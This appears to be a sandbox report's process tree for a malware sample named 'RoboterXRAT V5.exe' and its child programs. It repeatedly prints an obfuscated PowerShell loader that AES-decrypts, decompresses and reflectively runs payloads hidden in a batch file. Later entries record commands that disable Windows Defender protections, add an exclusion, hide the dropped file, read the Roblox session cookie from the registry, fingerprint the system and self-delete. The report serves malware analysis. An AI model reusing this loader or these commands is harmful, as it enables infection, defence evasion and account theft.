        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        20⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1844
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:3960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        18⤵
        
        PID:2068
        
        C:\Windows\system32\net.exe
        
        net file
        19⤵
        
        PID:6692
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        20⤵
        
        PID:6780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5928
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:6320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        17⤵
        
        PID:5640
        
        C:\Windows\system32\net.exe
        
        net file
        18⤵
        
        PID:3632
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        19⤵
        
        PID:4776
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        18⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2456
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:3280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        16⤵
        
        PID:4156
        
        C:\Windows\system32\net.exe
        
        net file
        17⤵
        
        PID:5744
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        18⤵
        
        PID:2504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:5416
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        15⤵
        
        PID:1208
        
        C:\Windows\system32\net.exe
        
        net file
        16⤵
        
        PID:3208
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        17⤵
        
        PID:3548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        16⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:5524
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        14⤵
        
        PID:5364
        
        C:\Windows\system32\net.exe
        
        net file
        15⤵
        
        PID:3408
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        16⤵
        
        PID:1132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6076
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:1752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        13⤵
        
        PID:5588
        
        C:\Windows\system32\net.exe
        
        net file
        14⤵
        
        PID:1888
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        15⤵
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        14⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2308
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        13⤵
        
        PID:5336
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        14⤵
        
        PID:5428
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        15⤵
        
        PID:2060
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        16⤵
        
        PID:4788
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        17⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        18⤵
        
        PID:5424
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        19⤵
        
        PID:6720
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:4700
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:5248
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:3076
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:6180
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        21⤵
        
        PID:5664
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        21⤵
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        20⤵
        
        PID:6820
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        20⤵
        
        PID:6512
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        19⤵
        
        PID:5484
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        19⤵
        
        PID:6164
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        18⤵
        
        PID:5700
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        18⤵
        
        PID:6428
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        17⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        16⤵
        
        PID:3544
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        16⤵
        
        PID:2896
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:5612
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        17⤵
        Views/modifies file attributes
        
        PID:3176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2152
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6436
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        17⤵
        
        PID:6476
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        17⤵
        
        PID:4828
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        17⤵
        
        PID:5240
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        17⤵
        
        PID:5996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6200
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        17⤵
        Detects videocard installed
        
        PID:6056
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        17⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5708
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:6552
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        15⤵
        
        PID:3264
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        15⤵
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        14⤵
        
        PID:2980
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        14⤵
        
        PID:4092
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        12⤵
        
        PID:2716
        
        C:\Windows\system32\net.exe
        
        net file
        13⤵
        
        PID:5908
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        14⤵
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        12⤵
        
        PID:4852
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        11⤵
        
        PID:5452
        
        C:\Windows\system32\net.exe
        
        net file
        12⤵
        
        PID:2492
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        13⤵
        
        PID:1900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7112
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
